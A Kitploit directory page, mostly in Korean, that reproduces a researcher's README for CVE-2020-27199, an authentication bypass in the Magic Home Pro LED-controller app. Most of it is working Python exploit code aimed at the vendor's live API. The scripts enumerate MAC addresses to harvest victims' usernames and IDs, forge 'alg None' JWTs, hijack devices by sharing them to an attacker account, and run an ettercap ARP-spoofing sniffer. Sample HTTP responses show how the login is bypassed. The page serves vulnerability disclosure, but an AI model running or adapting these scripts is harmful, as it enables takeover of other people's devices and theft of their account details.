Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-27199 — CVE-2020-27199 | Kitploit
도구/GitHubGitHub/9lyph/cve-2020-27199
ReconnaissanceIoT SecurityExploitationWeb Application ExploitationInformation GatheringPenetration TestingMobile SecurityAuthenticationPayload Development
GitHub9lyph/cve-2020-27199

CVE-2020-27199

CVE-2020-27199

71년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2020-27199 (Magic Home Pro - 인증 우회)

magic-home-pro

Magic Home Pro 모바일 애플리케이션에서 여러 취약점이 발견되었으며, 이 애플리케이션은 JadeHomic LED 스트립 RGB 키트와 인터페이스하는 데 사용됩니다. 이 중 가장 중요한 취약점은 인증 우회(CVE-2020-27199) 취약점으로, 궁극적으로 피해자의 전체 장치 그룹을 완전히 장악하고 제어할 수 있게 합니다.

  • 아래는 최종 익스플로잇으로 이어지는 열거 단계와 열거 및 최종 익스플로잇을 수행하는 데 사용된 PoC 자료를 설명합니다.

PoC Files

magichome-forge.py - JWT Forger, 장치 탈취 자동화에 사용됨

magichome-sniffer.py - 취약한 장치를 찾기 위해 네트워크를 검색하는 로컬 네트워크 스니퍼. 공격을 실행할 수 있는 장치 목록을 구축합니다.

magichome-switch.py - 장치를 켜는 기능을 제공합니다.

magichome-takeover.py - 사용자 계정의 성공적인 탈취를 가능하게 하는 페이로드

발견을 위한 사전 작업

  • 루팅된 Android
  • 루트 탐지를 패치, JAR 재서명 및 APK 재구축을 통해 우회 (필수)
  • 인증서 고정 우회 Frida to the rescue (필수)

Application

Magic Home Pro

제품 공급업체

JadeHomic

WiFi 컨트롤러 제품 소유자

Suzhou SmartChip Semiconductor Co.,Ltd

공급업체 웹사이트

JadeHomic

참고 자료

Mitre

Exploit-db

SpiderLabs Blog

영향을 받는 제품 코드 베이스

Magic Home Pro

Description

Base URL: wifij01us.magichue.net

열거

이 취약점은 인증된 사용자가 자신의 현재 인증 수준을 사용하여 /app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address> API 호출을 통해 자신의 등록된 제품에 속하지 않는 엔드포인트를 조회할 수 있게 합니다. 그러면 HTTP 응답으로 엔드포인트의 존재 여부를 나타내고 해당 엔드포인트의 사용자 이름, 사용자 고유 식별자(userUniID) 및 바인딩된 고유 ID(bindedUniID)를 반환합니다.

위의 조회를 사용하여 공격자는 새로 열거된 MAC 주소를 사용하여 API /app/sendCommandBatch/ZG001에 대한 승인되지 않은 POST 요청을 통해 호환되는 16진수 명령 71230fa3 및 71240fa4를 사용하여 원격 엔드포인트에 ON 및 OFF 명령을 각각 보낼 수 있습니다.

위에서 수집된 세부 정보를 기반으로 한 JWT 위조

초기 열거가 완료된 후, JWT 페이로드 데이터 내의 userID 및 uniID를 사용하여 JWT를 위조할 수 있으며, 이는 사실상 JWT 헤더 섹션에서 알고리즘으로 'None'을 사용하도록 토큰을 다운그레이드하는 것입니다(서명 우회 취약점). 이 취약점을 사용하여 공격자는 원격 API 호출 /app/shareDevice/ZG001을 통해 friendUserID JSON 매개변수를 사용하여 장치를 공격자의 장치 목록에 추가하여 엔드포인트 장치를 완전히 제어할 수 있습니다.

Credit(s):

  • Medium
  • JWT_TOOL - ticarpi

취약점 유형

  • 인증 우회
  • 정보 공개
  • 무단 접근
  • 수평적 권한 상승

추가 정보

OUI

OUI는 조직에 등록된 MAC 주소에 대한 조직 고유 식별자를 나타냅니다. JadeHomic의 경우 매직 OUI는 C8:2E:47이며, 여기서 첫 번째 3바이트는 제조업체에 해당하고 두 번째 3바이트는 제조업체가 할당한 일련 번호에 해당합니다. 우리의 경우 제조업체 식별자는 Suzhou SmartChip Semiconductor Co., LTD에 등록되어 있습니다.

CVE 기타 영향

Magic Home Pro 모바일 애플리케이션의 인증 우회를 가능하게 하여 피해자 사용자의 전체 장치 그룹을 완전히 제어할 수 있습니다.

공격 벡터

  • 인증된 사용자 필요
  • 기존 엔드 시스템의 성공적인 열거
  • 원격 엔드포인트에 배치 명령 전송
  • 장치 탈취
  • 인증 우회

PoC 열거자 및 배치 명령 익스플로잇

PoC는 MAC 범위 내의 마지막 바이트를 열거하고 결과를 반환합니다. 용기가 있다면 '원격 실행'을 테스트할 수 있습니다.``` import requests import json import os from colorama import init from colorama import Fore, Back, Style import re

'''

  1. First Stage Authentication
  2. Second Stage Enumerate
  3. Third Stage Remote Execute '''

global found_macaddresses found_macaddresses = [] global outtahere outtahere = "" q = "q" global token

def turnOn(target, token):

root@kitploit:~
urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71230fa3","macAddress":target}
    ]
}
data = json.dumps(array)
headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):

root@kitploit:~
urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}
data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):

root@kitploit:~
outtahere = ""
q = "q"
if len(str(target)) < 12:
    print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
    while outtahere.lower() != q.lower():
        if outtahere == "0":
            turnOn(target, token)
        elif outtahere == "1":
            turnOff(target, token)
        outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main(): urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

root@kitploit:~
data = {
    "userID":"<Valid Registered Email/Username>",
    "password":"<Valid Registered Password>",
    "clientID":""
}

headersAuth = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

# First Stage Authenticate

os.system('clear')
print (Fore.WHITE + "[+] Authenticating ...")
response = requests.post(urlAuth, json=data, headers=headersAuth)
resJsonAuth = response.json()
token = (resJsonAuth['token'])

# Second Stage Enumerate

print (Fore.WHITE + "[+] Enumerating ...")
macbase = "C82E475DCE"
macaddress = []
a = ["%02d" % x for x in range(100)]
for num in a:
    macaddress.append(macbase+num)

with open('loot.txt', 'w') as f:
    for mac in macaddress:
        urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
        params = {
            "macAddress":mac
        }

        headersEnum = {
            "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Content-Type": "application/json; charset=utf-8",
            "Accept": "application/json",
            "token": token,
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }

        response = requests.get(urlEnum, params=params, headers=headersEnum)
        resJsonEnum = response.json()
        data = (resJsonEnum['data'])
        if not data:
            pass
        elif data:
            found_macaddresses.append(mac)
            print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
            f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
        else:
            print (Fore.RED + "[-] No results found!")
            print(Style.RESET_ALL)

    if not found_macaddresses:
        print (Fore.RED + "[-] No MAC addresses retrieved")
    elif found_macaddresses:
        attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
        if (attackboolean.upper() == 'Y'):
            target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
            lighItUp(target, token)
        elif (attackboolean.upper() == 'N'):
            print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
        else:
            print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if name == "main": Main()

root@kitploit:~
#### 열거

![](https://assets.kitploit.com/production/public/readmes/14851/313dec37a245a36b311ba83f9bf03637209ab4b4bf5b0b51c283e53618544cfc.jpg)

#### 토큰 위조

##### PoC 토큰 위조기

- 성공적인 열거를 통해 획득한 **userID** 및 **uniqID**를 사용합니다. 이 PoC 토큰 위조기는 새로운 서명된 우회 JWT를 생성합니다.```
#!/usr/local/bin/python3

import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")

    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

디바이스 탈취

  • 공격자 이메일(대상 계정을 탈취하는 데 사용될 등록된 계정), 대상 이메일(탈취될 계정), 대상 MAC 주소(대상 이메일 주소와 연결됨), 그리고 위조된 토큰을 사용하여 디바이스를 탈취하는 익스플로잇
PoC 디바이스 탈취 익스플로잇```

#!/usr/local/bin/python3

import url64 import requests import json import sys import os from colorama import init from colorama import Fore, Back, Style import re

def Usage(): print (f"Usage: {sys.argv[0]} ")

def Main():

root@kitploit:~
attacker_email = sys.argv[1]
target_email = sys.argv[2]
target_mac = sys.argv[3]
forged_token = sys.argv[4]

os.system('clear')
print (Fore.WHITE + "[+] Sending Payload ...")
url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"

array = {"friendUserID":attacker_email, "macAddress":target_mac}

data = json.dumps(array)

headers = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":forged_token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if name == "main": if len(sys.argv) < 5: Usage() else: Main()

root@kitploit:~
##### 예시: 성공적인 POST 요청/응답 교환```
POST Request

POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

Response

HTTP/1.1 200 
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31

{"code":0,"msg":"","data":true}

Magic Home Device Sniffer

  • 요구 사항:
    • ettercap
    • 유효한 사용자 자격 증명
  • 이 스크립트는 취약한 장치를 찾고자 하는 네트워크 세그먼트에 대해 실행하기 위한 것입니다.
  • 발견되면 스크립트 내의 공격 메뉴를 사용하여 공격을 실행합니다.``` #!/usr/bin/env python3

import socket import struct import platform import os import sys import requests import json from colorama import init from colorama import Fore, Back, Style import re import time, subprocess

loot = [] global choice choice = '' global outtahere outtahere = "" q = "q" global macAddress

def scan(): with open('sniffedDevices.txt', 'a+') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL ) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL ) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL ) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL ) print (Fore.WHITE + '[+] Configuring IP Forwarding'+ Style.RESET_ALL ) time.sleep(5) print (Fore.WHITE + '[+] Setting up MiTM'+ Style.RESET_ALL ) time.sleep(2) ipForward = subprocess.Popen('sudo echo 1 > /proc/sys/net/ipv4/ip_forward', shell=True) time.sleep(2) ettercap = subprocess.Popen('sudo ettercap -T -q -i eth0 -M arp /// > /dev/null &', shell=True) time.sleep(2) print (Fore.WHITE + '[+] Searching for Magic Home Device(s)'+ Style.RESET_ALL ) itsthere = [] while (True): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003)) try: raw_data, addr = conn.recvfrom(65535) dst_mac, src_mac, proto, data = ethernet_frame(raw_data) if 'FF:FF:FF:FF:FF:FF' in dst_mac: # Suppress Broadcast traffic pass elif 'c8:2e:47'.upper() in src_mac: if src_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + src_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(src_mac) f.write(src_mac + "\n") elif 'c8:2e:47'.upper() in dst_mac: if dst_mac in loot: pass else: print (Fore.WHITE + '[+] Device ' + dst_mac + ' added to loot !'+ Style.RESET_ALL) loot.append(dst_mac) f.write(dst_mac + "\n") else: pass except KeyboardInterrupt: print (Fore.WHITE + "[+] Stopping MiTM"+ Style.RESET_ALL) time.sleep(2) subprocess.Popen.kill(ettercap) print (Fore.WHITE + '[+] Reconfiguring IP Forwarding'+ Style.RESET_ALL) time.sleep(2) os.system('sudo echo 0 > /proc/sys/net/ipv4/ip_forward') menu()

def turnOn(target, token): urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71230fa3","macAddress":target} ] }

root@kitploit:~
data = json.dumps(array)

headersOn = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched On" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token): urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"

root@kitploit:~
array = {
    "dataCommandItems":[
        {"hexData":"71240fa4","macAddress":target}
    ]
}

data = json.dumps(array)
headersOff = {
    "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
    "Accept-Language": "en-US",
    "Accept": "application/json", 
    "Content-Type": "application/json; charset=utf-8",
    "token":token,
    "Host": "wifij01us.magichue.net",
    "Connection": "close",
    "Accept-Encoding": "gzip, deflate"
}

print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
    if "true" in response.text:
        print (Fore.GREEN + "[*] Endpoint " + Fore.WHITE + f"{target}" + Fore.GREEN + " Switched Off" + Style.RESET_ALL)
    else:
        print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token): outtahere = "" q = "q" if len(str(target)) < 12: print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL) elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()): print (outtahere.lower()) while outtahere.lower() != q.lower(): if outtahere == "0": turnOn(target, token) elif outtahere == "1": turnOff(target, token) outtahere = input(Fore.GREEN + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL) menu()

def attack(): with open('sniffedDevices.txt', 'rb') as f: os.system('clear') print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.GREEN + "| Author: Victor Hanna (@9lyph) |"+ Style.RESET_ALL) print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL) print (Fore.GREEN + "| Attack Device : '1' |"+ Style.RESET_ALL) print (Fore.GREEN + "| Exit to Main Menu: '2' |"+ Style.RESET_ALL) print (Fore.GREEN + "| (CTRL^C to Quit) |"+ Style.RESET_ALL) print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL) print (Fore.WHITE + "[+] These are you available local targets:"+ Style.RESET_ALL) alreadyDone = [] for target in f.readlines(): macAddresses = ((target).replace(b":", b"")) if macAddresses in alreadyDone: continue else: alreadyDone.append(macAddresses) print (target.replace(b":", b"").decode('utf-8').strip())

root@kitploit:~
    choice = int(input ("Choice: "))
    if (choice == 1):
        macAddress = input("[+] Enter Device MAC (xxxxxxxxxxxx): ")
        urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"

        data = {
            "userID":"<!--Valid Username-->",
            "password":"<!--Valid Password-->",
            "clientID":""
        }

        headersAuth = {
            "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
            "Accept-Language": "en-US",
            "Accept": "application/json", 
            "Content-Type": "application/json; charset=utf-8",
            "Host": "wifij01us.magichue.net",
            "Connection": "close",
            "Accept-Encoding": "gzip, deflate"
        }
        print (Fore.WHITE + "[+] Authenticating ...")
        response = requests.post(urlAuth, json=data, headers=headersAuth)
        resJsonAuth = response.json()
        token = (resJsonAuth['token'])
        lighItUp(macAddress, token)
    elif (choice == 2):
        menu()
    else:
        attack()

def ethernet_frame(data): dst_mac, src_mac, proto = struct.unpack('!6s6sH', data[:14]) return get_mac_addr(dst_mac), get_mac_addr(src_mac), socket.htons(proto), data[14:]

def get_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper()

def menu(): os.system('clear') while (True):

root@kitploit:~
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Author: Victor Hanna (@9lyph)       |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Description: Magic Home Pro Sniffer |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Scan   : '1'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| Attack : '2'                        |"+ Style.RESET_ALL)
    print (Fore.GREEN + "| (CTRL^C to Quit)                    |"+ Style.RESET_ALL)
    print (Fore.GREEN + "+=====================================+"+ Style.RESET_ALL)
    try:
        choice = (input ("Choice: "))
        if (int(choice) == 1):
            scan()
        elif (int(choice) == 2):
            attack()
    except KeyboardInterrupt:
        os.system ('sudo echo 0 > /proc/sys/net/ipv4/ip_forward')
        print("\nBye bye !\n")
        sys.exit()

if name == 'main': menu()

root@kitploit:~
### 인증 우회 (Magic Home Pro) (CVE-2020-27199)

- JSON 토큰 변조와 위 열거를 통해 수집된 정보(즉 피해자 이메일, ClientID 및 UniqID)를 결합하여 HTTP 응답을 조작함으로써 모바일 앱 인증 과정을 우회하고, 피해자로 애플리케이션에 접근할 수 있습니다.
- 공격자는 피해자의 이메일 주소, 임의의 비밀번호 및 clientID를 사용하여 Magic Home Pro 애플리케이션을 이용합니다.
- 그런 다음 공격자는 1단계의 세부 정보를 사용하여 HTTP 응답을 조작함으로써 우회가 발생하도록 할 수 있습니다.```
Original HTTP Login Request via Magic Home Pro Mobile app
 
POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate
 
{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

Original HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37
 
{"code":10033,"msg":"Password error"}

Edited HTTP Response
 
HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907
 
{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}

동영상 익스플로잇 PoC

Magic Home PRO - 익스플로잇

발견자/크레딧:

Exploit Security의 Victor Hanna

다음에서 저를 팔로우하세요

Mastodon Linkedin Youtube

도구 다운로드